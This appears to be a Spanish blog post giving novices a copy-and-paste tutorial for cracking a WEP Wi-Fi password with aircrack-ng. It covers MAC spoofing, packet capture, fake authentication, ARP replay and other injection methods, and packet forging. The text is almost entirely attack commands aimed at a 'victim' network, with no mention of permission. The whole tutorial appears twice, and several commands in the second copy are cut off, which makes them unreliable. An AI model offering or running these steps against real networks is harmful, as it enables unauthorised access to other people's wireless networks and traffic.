Bueno para aquellos que quieren probar aquí les pongo todos los comandos en el orden que debe de ser para que
solo le den copiar:
Paso 1 # airmon-ng
Paso 2 # airmon-ng stop wlan0
# ifconfig wlan0 down
paso3 # macchanger –mac 00:11:22:33:44:55 wlan0
paso 4 # airmon-ng start wlan0
paso 5 # airodump-ng wlan0 ( aquí cogeremos la estation del bssid que atacamos y volvemos al paso 2 si no hay
ninguna station con nuestra bssid cogemos la que sea porque por lo menos sera real y dará menos problemas.
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap
Como se darán cuenta son pocos comandos pero llevan mucha explicación y lo trate de hacer de una forma
entendible
Para aquellos que quieren probar otras formas de inyección aquí les dejo otras dos formas que me han funcionado
perfecto.
Forma 2:
# aireplay-ng -1 0 -a -h -e wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando
Forma 3:
# aireplay-ng -1 0 -a -h -e wlan0
# aireplay-ng -5 -b -h wlan0
Ver como se llama el archivo .xor
# packetforge-ng -0 -a -h -k 255.255.255.255 -l 255.255.255.255 -y -w ARP
# aireplay-ng -2 -r ARP wlan0
Solo aclarar que este tuto es para novatos, por lo que para alguien con algo de experiencia no tiene que pasar del
paso 5 al 2 y seguir Bastaría con saltarse algunos pasos EJ:
airmon-ng start wlan0
airodump-ng wlan0 escogemos la mac y la station pulsamos ctrl+c para parar todo las copiamos y recordamos el
canal CH ej: 3,
airmon-ng stop wlan0
ifconfig wlano down
macchanger –mac 0B:A1:89:10:26:B0 wlan0
airodump-ng wlan0 –c 3 (como ves ahora si que he puesto el canal para eliminar distracciones y centrarnos en la
victima)
airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 0B:A1:89:10:26:B0 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 0B:A1:89:10:26:B0 wlan0
aircrack-ng nombredelarchivo.cap
solo le den copiar:
Paso 1 # airmon-ng
Paso 2 # airmon-ng stop wlan0
# ifconfig wlan0 down
paso3 # macchanger –mac 00:11:22:33:44:55 wlan0
paso 4 # airmon-ng start wlan0
paso 5 # airodump-ng wlan0 ( aquí cogeremos la estation del bssid que atacamos y volvemos al paso 2 si no hay
ninguna station con nuestra bssid cogemos la que sea porque por lo menos sera real y dará menos problemas.
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap
Como se darán cuenta son pocos comandos pero llevan mucha explicación y lo trate de hacer de una forma
entendible
Para aquellos que quieren probar otras formas de inyección aquí les dejo otras dos formas que me han funcionado
perfecto.
Forma 2:
# aireplay-ng -1 0 -a
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando
Forma 3:
# aireplay-ng -1 0 -a
# aireplay-ng -5 -b
Ver como se llama el archivo .xor
# packetforge-ng -0 -a
# aireplay-ng -2 -r ARP wlan0
Solo aclarar que este tuto es para novatos, por lo que para alguien con algo de experiencia no tiene que pasar del
paso 5 al 2 y seguir Bastaría con saltarse algunos pasos EJ:
airmon-ng start wlan0
airodump-ng wlan0 escogemos la mac y la station pulsamos ctrl+c para parar todo las copiamos y recordamos el
canal CH ej: 3,
airmon-ng stop wlan0
ifconfig wlano down
macchanger –mac 0B:A1:89:10:26:B0 wlan0
airodump-ng wlan0 –c 3 (como ves ahora si que he puesto el canal para eliminar distracciones y centrarnos en la
victima)
airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
aireplay-ng -1 0 -a (bssid) -h 0B:A1:89:10:26:B0 -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h 0B:A1:89:10:26:B0 wlan0
aircrack-ng nombredelarchivo.cap
No hay comentarios:
Publicar un comentario